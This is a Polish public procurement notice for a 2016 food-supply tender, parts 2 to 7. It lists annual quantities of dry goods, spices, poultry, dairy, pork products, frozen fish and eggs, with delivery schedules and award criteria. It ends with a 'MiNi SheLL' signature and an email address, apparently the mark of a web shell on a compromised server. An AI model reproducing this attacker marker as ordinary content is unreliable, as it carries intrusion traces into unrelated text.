<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa II. Przetwory sypkie, przyprawy, produkty strączkowe, przetwory, napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa II. Przetwory sypkie, przyprawy, produkty strączkowe, przetwory, napojeLp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Ananas plastry                                                     565 g	szt.	150
2.		Aromaty do ciast                                                   10 g	szt.	105
3.		Barszcz czerwony (koncentrat)                      320 ml	szt. 	60
4.		Bazylia                                                                     10 g	szt.	45
5.		Brzoskwinie w syropie                                        820 g	szt.	55
6.		Budyń różne smaki Winiary                           60-64 g	szt.	1 250
7.		Bułka tarta                                                             1  kg	kg	115
8.		Chrzan tarty                                                         290 g	szt.	350
9.		Ciastka biszkopty Wrocławskie Mamut          120 g	szt.	70
10.		Cukier kryształ                                                        1 kg	kg	2 400
11.		Cukier waniliowy                                                   32 g	szt.	170
12.		Cynamon                                                                 20 g	szt.	50
13.		Drożdże świeże                                                    100 g	szt.	60
14.		Dżem owocowy (różne smaki) Pińczów          280 g	szt.	600
15.		Dżem bezcukrowy (różne smaki)  Stovit         220 g	szt.	50
16.		Fasola czerwona konserwowa                          400 g	szt.	100
17.		Fasola Jaś                                                                1 kg	kg	160
18.		Filety śledziowe w oleju                                     170 g	szt.	550
19.		Filety śledziowe w pomidorach                        170 g	szt.	280
20.		Galaretka owocowa   Delecta                             75 g	szt.	650
21.		Gałka muszkatołowa                                             15 g	szt.	25
22.		Groch łuskany                                                         1 kg	kg	140
23.		Groszek konserwowy                                         400 g	szt.	500
24.		Herbata                                                                   1 kg	kg	85
25.		Herbata owocowa Saga (op. 25 torebek)	op.	40
26.		Imbir mielony                                                         20 g	szt.	25
27.		Kakao                                                                     200 g	szt.	50
28.		Kasza gryczana                                                       1 kg	kg	130
29.		Kasza jęczmienna                                                  1 kg	kg	250
30.		Kasza kukurydziana                                               1 kg	kg	70
31.		Kasza manna                                                          1 kg	kg	90
32.		Kaszka mleczno -ryżowa truskawkowa Nestle                     230g 	szt.	10
33.		Kawa zbożowa                                                     500 g	szt.	60
34.		Ketchup łagodny                                                 500 g	szt.	250
35.		Kisiel różne smaki Winiary                                  77 g	szt.	1 200
36.		Kminek                                                                    20 g	szt.	65
37.		Koncentrat pomidorowy 30%   Pińczów         950 g	szt.	200
38.		Konserwa mięsna  
Przysmak Śniadaniowy                                       300 g	szt.	700
39.		Koperek suszony                                                    10 g	szt.	180
40.		Kostki rosołowe drobiowe  Winiary                   60 g	szt.	200
41.		Kostki rosołowe wołowe Winiary                       60 g	szt.	200
42.		Krem do smarowania pieczywa o smaku czekoladowym                                                     200 g	szt.	100
43.		Krem do smarowania pieczywa o smaku orzechowym                                                        200 g	szt.	100
44.		Kukurydza konserwowa                                     400 g	szt.	250
45.		Kwasek cytrynowy                                                 20 g	szt.	150
46.		Liść laurowy                                                              7 g	szt.	120
47.		Majeranek                                                                 8 g	szt.	120
48.		Majonez Kielecki                                                 500 g	szt.	500
49.		Makaron nitki Lubella                                           2 kg	kg	500
50.		Makaron łazanki                                                    2 kg	kg	150
51.		Makaron muszelki                                                 2 kg	kg	150
52.		Makaron spaghetti Lubella                                  1 kg	kg	120
53.		Makaron świderki                                                  2 kg	kg	610
54.		Margaryna śniadaniowa Bielmar                     500 g	kg	710
55.		Margaryna zwykła                                               250 g	kg	165
56.		Marmolada Duchnice                                         850 g	szt.	120
57.		Marynata klasyczna Prymat                                20 g	szt.	100
58.		Marynata staropolska  Kamis                              20 g	szt.	120
59.		Masło roślinne  kubek Kruszwica                     250 g	kg	250
60.		Mąka pszenna typ 500                                         1 kg	kg	450
61.		Mąka ziemniaczana                                               1 kg	kg	20
62.		Mąka żytnia typ 500                                              1 kg	kg	150
63.		Miód pszczeli  wielokwiatowy                          370 g	szt.	120
64.		Mlekołaki kulki, kółka kakaowe                       250 g	szt.	10
65.		Morele suszone                                                   150 g	szt.	10
66.		Musztarda   stołowa                                           190 g	szt.	450
67.		Ocet                                                                         0,5 l	szt.	20
68.		Ogórki konserwowe                                            850 g	szt.	240
69.		Olej uniwersalny                                                       3 l                                 	l	450
70.		Oregano                                                                  10 g	Szt.	35
71.		Papryka konserwowa                                         780 g	szt.	60
72.		Papryka ostra                                                         20 g	szt.	85
73.		Papryka słodka                                                       20 g	szt.	140
74.		Pasztet drobiowy  Podlaski                                155 g                                              	szt.	850
75.		Pasztet Mazowiecki                                            460 g	szt.	350
76.		Pieczarki marynowane                                       770 g	szt.	100
77.		Pieprz naturalny mielony                                     20 g	szt.	600
78.		Pieprz ziołowy                                                        20 g	szt.	550
79.		Pietruszka suszona                                                10 g                                   	szt.	90
80.		Płatki jęczmienne                                                  1 kg	kg	80
81.		Płatki kukurydziane                                               1 kg	kg	40
82.		Płatki owsiane                                                        1 kg	kg	60
83.		Pomidory obierane                                             400 g	szt.	400
84.		Powidła węgierkowe                                          280 g	szt.	160
85.		Proszek do pieczenia                                            30 g	szt.	60
86.		Przyprawa do drobiu Cykoria                              40 g	szt.	135
87.		Przyprawa do ryb Cykoria                                    40 g	szt.	80
88.		Przyprawa do ziemniaków  Cykoria                   30 g	szt.	50
89.		Przyprawa  Warzywko                                          1 kg	kg	60
90.		Przyprawa w płynie  Maggi                                     1 l	l	130
91.		Rodzynki                                                               100 g	szt.	100
92.		Ryż długoziarnisty biały                                       1 kg	kg	550
93.		Sałatka rybna                                                        150g	szt.	800
94.		Sok pomidorowy  Hortex                                       1 l	szt.	20
95.		Słodzik                                                     op. 1000 szt.	op.	5
96.		Sól jodowana                                                          1 kg	kg	500
97.		Suchary delikatesowe Mamut                          285 g 	szt.	10
98.		Syrop owocowy Łowicz różne smaki              440ml	szt.	200
99.		Szczaw konserwowy                                           285 g	szt.	60
100.		Szprot w oleju                                                      170 g	szt.	250
101.		Szprot w pomidorach                                         170 g	szt.	250
102.		Szynka konserwowa mielona  Werbliński       110 g	szt.	1 250
103.		Śliwki suszone bez pestki                                   150 g	szt.	70
104.		Tuńczyk w oleju                                                   170 g	szt.	700
105.		Wiórki kokosowe                                                 100 g	szt.	30
106.		Woda mineralna gazowana                                 1,5 l	szt.	900
107.		Woda mineralna niegazowana                           1,5 l	szt.	100
108.		Zacierki                                                                    1 kg	kg	150
109.		Ziele angielskie                                                       15 g	szt.	130
110.		Zioła prowansalskie                                              10 g	szt.	50
111.		Zupa grzybowa Winiary                                        48 g	szt.	400
112.		Zupa pieczarkowa Winiary                                   45 g	szt.	450
113.		Zupa ogonowa Winiary                                        41 g	szt.	150
114.		Żelatyna spożywcza                                              40 g 	szt.	100
115.		Soda oczyszczona                                                100 g	szt.	5
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:
Grupa II. Przetwory sypkie,  przyprawy, produkty strączkowe, przetwory, napoje -              1 raz w  tygodniu - w godz. 8.00 -14.00 ( od poniedziałku do czwartku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa  III. Drób i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa III  Drób i przetwory drobiowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	750
2.		Korpusy z kurczaka	kg	550
3.		Filet z kurczaka	kg	700
4.		Ćwiartki  z kurczaka	kg	800
5.		Wątróbka drobiowa	kg	200
6.		Żołądki z kurczaka	kg	150
7.		Mięso drobiowe gulaszowe II	kg	350
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:
Grupa III. Drób i przetwory drobiowe - 4 razy w miesiącu - w godz. 8.00 -14.00 (oprócz piątku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa  IV. Nabiał i przetwory nabiałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa IV       Nabiał i przetwory nabiałowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	800
2.		Twaróg  półtłusty 	kg	500
3.		Masło extra   82% tłuszczu                       200 g                           	kg	250
4.		Ser żółty  Gouda	kg	250
5.		Jogurt owocowy                                         150 g	szt.	4 500
6.		Jogurt naturalny                                         450 g	szt.	1 500
7.		Serek topiony   krem. op.                          100 g	szt.	1 800
8.		Serki homogenizowane waniliowe          100 g	szt.	800
9.		Kefir  kubek                                                  450 g	szt.	2 000
10.		Śmietana  24 %  kubek                            400 ml	szt.	1 000
11.		Śmietana 12%  karton       poj.               500 ml	szt.	350
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:
Grupa IV. Nabiał i przetwory nabiałowe - 1 raz w tygodniu - w godz. 800 -1400 (oprócz piątku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa  V. Mięso wieprzowe , wędliny i wyroby podrobowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa V         Mięso wieprzowe , wędliny  i wyroby podrobowe
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	300
2.		Boczek surowy wieprzowy bez skóry 	kg	250
3.		Schab  wieprzowy bez kości 	kg	250
4.		Szynka wieprzowa bez kości i bez skóry	kg	350
5.		Łopatka wieprzowa bez kości i bez skóry	kg	400
6.		Słonina wieprzowa bez skóry	kg	150
7.		Podroby wieprzowe bez wątroby	kg	180
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	250
10.		Mięso wieprzowe II 	kg	550
11.		Karczek wieprzowy bez kości	kg	120
12.		Kiełbasa szynkowa wieprzowa	kg	140
13.		Kiełbasa  mielonka tyrolska	kg	250
14.		Mortadela bez dodatków	kg	310
15.		Kiełbasa cienka zwyczajna wędzona	kg	800
16.		Parówki  wieprzowe	kg	300
17.		Parówki drobiowe	kg	200
18.		Kiełbasa  krakowska parzona	kg	200
19.		Kiełbasa biała żurkowa	kg	350
20.		Szynka wędzona	kg	15
21.		Ogonówka wieprzowa wędzona 	kg	25
22.		Boczek wędzony	kg	150
23.		Pasztet pieczony wieprzowy	kg	150
24.		Salceson  włoski	kg	220
25.		Salceson  czarny	kg	50
26.		Pasztetowa wieprzowa	kg	180
27.		Kaszanka jęczmienna	kg	250
28.		Kiełbasa szynkowa drobiowa	kg	120
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:
Grupa V. Mięso wieprzowe , wędliny i wyroby podrobowe- 3 razy w tygodniu - w godz. 8.00 -14.00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa VI. Art. spożywcze mrożone , ryby wędzone i solone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa VI        Art. spożywcze mrożone, ryby wędzone i solone
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Fasolka szparagowa mrożona                  450 g	szt.	1 050
2.		Mieszanka kompotowa mrożona                          	kg	500
3.		Mieszanka warzywna mrożona 	kg	400
4.		Filet mrożony z miruny	kg	650
5.		Filety śledziowe bez skóry solone	kg	60
6.		Makrela wędzona bez głowy	kg	30
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:
Grupa VI. Art. spożywcze mrożone , ryby wędzone i solone - 1 raz w tygodniu - w godz. 8.00 -14.00 (oprócz piątku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa VII. Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa VII         Jaja
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Jaja 50-60 g	szt.	22 000
Termin wykonania zamówienia
1.1.	Od  02 stycznia 2016 do 31 grudnia 2016.
1.2.	Dostawy częściowe, sukcesywne, uruchamiane telefonicznie, częstotliwość dostaw jak niżej:
Grupa VII. Jaja - 1 raz w tygodniu - w godz. 800 -1400 (oprócz piątku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com